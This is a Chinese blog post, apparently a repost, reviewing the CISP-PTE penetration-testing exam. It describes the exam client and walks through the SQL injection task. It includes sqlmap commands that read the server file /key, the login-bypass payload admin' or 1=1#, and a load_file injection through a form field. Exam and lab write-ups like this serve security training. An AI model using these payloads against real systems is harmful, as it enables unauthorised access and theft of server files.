您的位置:首页 > 财经 > 金融 > cisp-pte考试复盘

cisp-pte考试复盘

2024/11/19 20:26:12 来源:https://blog.csdn.net/XiaoYeZhu_1314/article/details/141102185  浏览:    关键词:cisp-pte考试复盘
考试客户端下载-->点击进入考试>输入密码->进去可以看见一个qax的登录框【监考员会告知账户密码】->进入考试页面

里面的操作题,点击开始答题,能看见一个题有一个攻击机,这时我们需要点击鼠标左键,看见一个控制台,点击控制台才能进入答题【双击是没有用的】

注:数度要慢,可以等,但是不能一直点,因为考试环境是win7

题型
选择题:全是单选

每个人的选择题不一样

第一题:sql注入

方法一:sqlmap -r 跑post包

登录框,直接抓包,复制整个包下来保存为.txt文件

再使用sqlmap -r 1.txt 跑出注入类型

再输入sqlmap.py -r 1.txt --file-read /key得到key值

如果没有跑出来就在后面加 --level=5 --risk=3 --batch

方法二:手工注入

先万能密码登录

admin' or 1=1#

在患者编辑处,找到电话的位置填写

1',comefrom=(select load_file('/key'))#
或者
1',comefrom=(select load_file('/key')) -- 1

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com